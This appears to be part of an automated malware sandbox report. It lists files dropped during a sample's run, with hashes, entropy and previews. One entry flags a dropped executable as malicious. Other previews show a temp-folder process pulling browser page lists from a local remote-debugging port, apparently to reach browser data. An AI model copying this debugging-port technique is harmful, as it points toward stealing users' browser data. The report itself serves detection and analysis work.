                                                                                                                                                                                                                                                                                                      MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                      SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                      SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                      SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):575056
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                      MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                      SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                      SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                      SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):460992
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                      MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                      SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                      SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                      SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                      MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                      SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                      SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                      SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:uriCache_
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):179
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.001563127514606
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQoVEpVcy:YWLSGTt1o9LuLgfGBPAzkVj/T8lQoVEL
                                                                                                                                                                                                                                                                                                      MD5:0570CF96F3544A17109BF8B8C4AE0917
                                                                                                                                                                                                                                                                                                      SHA1:C6A083E411E71848A7F82E961683052ED594ECC3
                                                                                                                                                                                                                                                                                                      SHA-256:3CF08AFDD6BCBF3C764EBE75F610DE1AC6F221AF9676C8541B9AA22F25F5CA47
                                                                                                                                                                                                                                                                                                      SHA-512:212447BD8FD1535B5713ADD4F663772F3AC16EF18FDCD5C5C0247EF9121B35C40F0C8E024077FAE90EAF9C728013CB231F8DED723408C51B54821E997CE1C9E2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735071301814109}]}
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):86
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                                      MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                                      SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                                      SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                                      SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44906
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.095173444193261
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWxxi1zNtZBcXOXNgTUpMEKKJDSgzMMd6qD47u3+CiB:+/Ps+wsI7ynjHIKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:AD32AACEA077E67947B5830B4160C8CC
                                                                                                                                                                                                                                                                                                      SHA1:63B9074DCD270880F7F6E2D1316FA6BE79EBC276
                                                                                                                                                                                                                                                                                                      SHA-256:DAF1481B5613D836F7391FAF2D1615628E02605E3054320446D6518BB2793D6D
                                                                                                                                                                                                                                                                                                      SHA-512:A82D04B4ADF09C3A505AC74A42173BEC13522427E89017040227EC062ADBBD27210B0A1600E1C2A2A7FEF431593CB17B51CA99ACE958580601176ED2F27BD85C
                                                                                                                                                                                                                                                                                                      Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.0898018136551775
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWBdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynn0kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:D97F50FFCB5706CD18AA51F6BB81C6CA
                                                                                                                                                                                                                                                                                                      SHA1:38F68E971CF53E78DB46DA70E66F1F41F793FD4B
                                                                                                                                                                                                                                                                                                      SHA-256:0D3226017EF75ED36EED0FAF059760596E0C70A57A8456FAF63C80D497721B2D
                                                                                                                                                                                                                                                                                                      SHA-512:3647F063E1588DEBFE34B2EDDD0A74E96AFB02A4EA30D32E4B00A4113311A594348C1A836F70E8744981E5EC8D5EA721C8303B42C90C68FF81D960960416768B
                                                                                                                                                                                                                                                                                                      Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2278
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.856095310462232
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKxrgxMGxl9Il8udiFHfttKVqGM6o+UBd1rc:msYeFHfvIMNi
                                                                                                                                                                                                                                                                                                      MD5:BEA5A3125558E969481E36BBBF140A66
                                                                                                                                                                                                                                                                                                      SHA1:A317F99356AEFED49367A9D2BE7574D60C3FE1B1
                                                                                                                                                                                                                                                                                                      SHA-256:809317A2EF1E658EFC0510153ACAC8D291EAA8F7E21F0CEB1494FB2D9BC1DA9F
                                                                                                                                                                                                                                                                                                      SHA-512:48B443E6ED331D674022A61294D314857EE44EDB521878298D22CB93943596D87E9D7D6BE09F5DBA39BD51CE391B5A90BE26A4B39B3DEE61E36474F968518F44
                                                                                                                                                                                                                                                                                                      Malicious:false
Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"WipwWM+NHlbCDmsZp8SOsjhtFBs="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"gBgXM15V2wE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AAAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA5sd246
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4622
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9999092150394837
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKxExPxD9Il8ud1raR3rWQgTPTlL5Mhfxug2fHpj+jWX714RSiULsLUyApMD:BYsR3BgbpL5+c3JX71GS5LsLUyCMnEI
                                                                                                                                                                                                                                                                                                      MD5:70D0E81E031A626713E554480166A1FC
                                                                                                                                                                                                                                                                                                      SHA1:66DDDA162F84DBA4C56E6F29B1E61912CE7DDE5E
                                                                                                                                                                                                                                                                                                      SHA-256:16368230C836EA8A6D1F4A6C2F5211F3B103C2B16A44CA2CB5578E8F743E20E6
                                                                                                                                                                                                                                                                                                      SHA-512:DECC640F5FF8652E4C559A61A14AA704D15D793300B21B251034331EF064EC2FE31FD1DF6BD5724A64C416F7F967130BE7D8C1BA6A0610C53CD6A252ADC7500C
                                                                                                                                                                                                                                                                                                      Malicious:false
Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"z3UTqTb37/uzhiflb40fzhDrEsw="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"SnAJGVZV2wE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AwAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA5sd246
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2684
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8875186524131244
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKx68Wa7xwyxl9Il8udtSaaSsTIxB4bEgOZRbzd/vc:aCWYJZnJebROfbu
                                                                                                                                                                                                                                                                                                      MD5:6651AB978522CCDEC9D74AD760FF703B
                                                                                                                                                                                                                                                                                                      SHA1:5C6DB3B80F081151782D1A79CE12823FCCD39CBD
                                                                                                                                                                                                                                                                                                      SHA-256:69C1F7A959598718829EA5FFD345F4AAD455CD278413256A3EAEA0FA1E4DED20
                                                                                                                                                                                                                                                                                                      SHA-512:674379517464076DA24675891EDA3A664C1C5E7FEB13B59600012ECC79FE4D9942C3088A3D6341CBC8072B6C4766741E02D77BB14CB49D418ECE9B49D9D0E67B
                                                                                                                                                                                                                                                                                                      Malicious:false
Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"6N3Uy9nAUEqs5u96E/og0E/VJAg="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"JdisSCd03AE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AAAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA5sd246
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3500
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.397631592184683
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:6NnC+HCmNnCcbCgNnC1qD9CCNnCNdgECaNnCxWCSNnCDjlj6DCDjxNnC8wCrNnCN:6NtNhN8qJNuFNVNzgNNtN8
                                                                                                                                                                                                                                                                                                      MD5:3FD48C1B23F95A73B5F36F6ACF4F00A9
                                                                                                                                                                                                                                                                                                      SHA1:E0C48D87BE4DA52C093FFDE57D6227DCB4108EED
                                                                                                                                                                                                                                                                                                      SHA-256:7CC1B3130942CC6D18142A8A31A6D1ECAF981FC120BBE5BB08230578737C28F4
                                                                                                                                                                                                                                                                                                      SHA-512:45D4B4140F566B75321ECB13C20458FD4B2CEEDCCC6AB18655E7AF307AFB762F8653FBE0FA94AF2B138A5CC64D9A80640E04C3BF1281F1C7AAD83213CDA3CD4B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/B3B7CCCFD29464A6EA6BEA8AD2F88843",.. "id": "B3B7CCCFD29464A6EA6BEA8AD2F88843",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/B3B7CCCFD29464A6EA6BEA8AD2F88843"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/58AD78445682284BA1099FBB197FFE63",.. "id": "58AD78445682284BA1099FBB197FFE63",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/58AD78445682284BA1099FBB197FFE63"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1787
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.381254490667222
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:SfNaoCxq9q1TECxqLfNaoCFuCkfNaoCBC8fNaoCAh6hc0UrU0U8CAh1:6NnC401TEC4jNnCFuCQNnCBCoNnCAMix
                                                                                                                                                                                                                                                                                                      MD5:8EA54A4BA5F1D09AC8893C88BCE84507
                                                                                                                                                                                                                                                                                                      SHA1:37C330C7F252FD71DDAF03FE3CB6913A9822DE4F
                                                                                                                                                                                                                                                                                                      SHA-256:B17D2C0E3ECAEE6470D0227C312E55554F5CAD123785D52F9FE170226B3806E4
                                                                                                                                                                                                                                                                                                      SHA-512:C912C51C2E5BCC77C701F79932CB78FBD943316BD897FF1DC175D2145B9CF5CA1317DAF5DA67A99A35F8255EC1C05641A991A7823E0F788F2864B779862B807F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/45E055C79B6075965F24B73754AA2A61",.. "id": "45E055C79B6075965F24B73754AA2A61",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/45E055C79B6075965F24B73754AA2A61"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/25896A4DF1D7A09A1E6D31E65ECFBA8D",.. "id": "25896A4DF1D7A09A1E6D31E65ECFBA8D",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/25896A4DF1D7A09A1E6D31E65ECFBA8D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41924
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):76314
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.996159328201069
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:fFZ2cHkObrS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz88:fbb1UdS8scZNzFrMa4M+lKqeZ
                                                                                                                                                                                                                                                                                                      MD5:703D592C85D2790D89047C1614A54B4F
                                                                                                                                                                                                                                                                                                      SHA1:0C08F096AD544A63ACE8AA1AA738CC0B374F2A23
                                                                                                                                                                                                                                                                                                      SHA-256:A01513000969824FA1761DCDD77F5EE9B6FD958B4E9596522CEBC47BB69DF194
                                                                                                                                                                                                                                                                                                      SHA-512:D0C0F0B0A060D3DD52942556615B93971292E1F0C10555681CB6E4857E605EB2CFBACBADD263FB954D4062A63BBCCCB4B514428FDB95F6C0C94CC221B28B1ED5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):70300
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.836652071119625
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:ysLuWMIBKe19FhAVmEz63lXv2os8VJvxmR5ukmxdL5z/M7tz:rD719umEO3lXvFs8Pi5u7P5z/M7tz
                                                                                                                                                                                                                                                                                                      MD5:B148B122BB58B8165365C9F89467A70D
                                                                                                                                                                                                                                                                                                      SHA1:AD26032DF54814F721DE4C545A6268FA9EFD5562
                                                                                                                                                                                                                                                                                                      SHA-256:DD0B48AD726395A4728039D7AEBD7523403D2A998E4466934C7ECD8C4828D663
                                                                                                                                                                                                                                                                                                      SHA-512:5FFD1833D15F87EACF374F06B3EFF700090FD299DA0848B6F1D092D50A41609C2DEDB9FF5080DEF842978D80297A243C4A16A125FAA7B0917F0056251F986C61
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):947288
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                                                                      • Filename: 94e.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: 94e.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: 0442.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: acronis recovery expert deluxe 1.0.0.132.rarl.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: trZG6pItZj.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: 9EI7wrGs4K.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: Wine.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: GoldenContinent.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):297275
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999341212668941
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:6144:Y+rD4Rgr9rauGzemYrmALg9rA08MHBu9qBvkgwYe2v5ri:Y3R+9rauGzemYaCErZ8MhuUvWn2vJi
                                                                                                                                                                                                                                                                                                      MD5:44BB200868649A063953CF0BB7528502
                                                                                                                                                                                                                                                                                                      SHA1:7DB0B074DDB4F52EAF6ECBFBF41CE67A44B0DAEE
                                                                                                                                                                                                                                                                                                      SHA-256:7D2D6B8D47B9EE4ADE15BD0C992190554268F235C18B27EA8C213D474AD6F7D8
                                                                                                                                                                                                                                                                                                      SHA-512:5592078C4AA02737000942FE204111C72C547B0732A26CB776C572441DBE8BCB9DCBE2443EDE3FEE47899E88E998F2A3B610CED103E834FA34673F28B55E5BA8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.998060761603133
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:UDTO2z/dSbLtDW4ictJHgoI2JnSbp2O+KwpJNlqcN9O7xTT6M17arlMmZv/:UDqWgFK4zfA08MRjpBNg7ZqlPv/
                                                                                                                                                                                                                                                                                                      MD5:CF44A9847F3FB78E1B20E0F6058E073A
                                                                                                                                                                                                                                                                                                      SHA1:47517215A4145D9DCDDB3306C0FB931C71DDFE9D
                                                                                                                                                                                                                                                                                                      SHA-256:D2E7128B474AC99272C683AAEEE8A8F8BDC8638A28D7B5E769C2B894EBC45B31
                                                                                                                                                                                                                                                                                                      SHA-512:EAA9141B5C4BC8FCAD07BF71A6DC14990B83B472BB8FBC156AAF694BC4A9FD984793F4BCD4058B6FB3D6FE88AD828BCE2A8D44F556D3F67870AC484021510FE4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
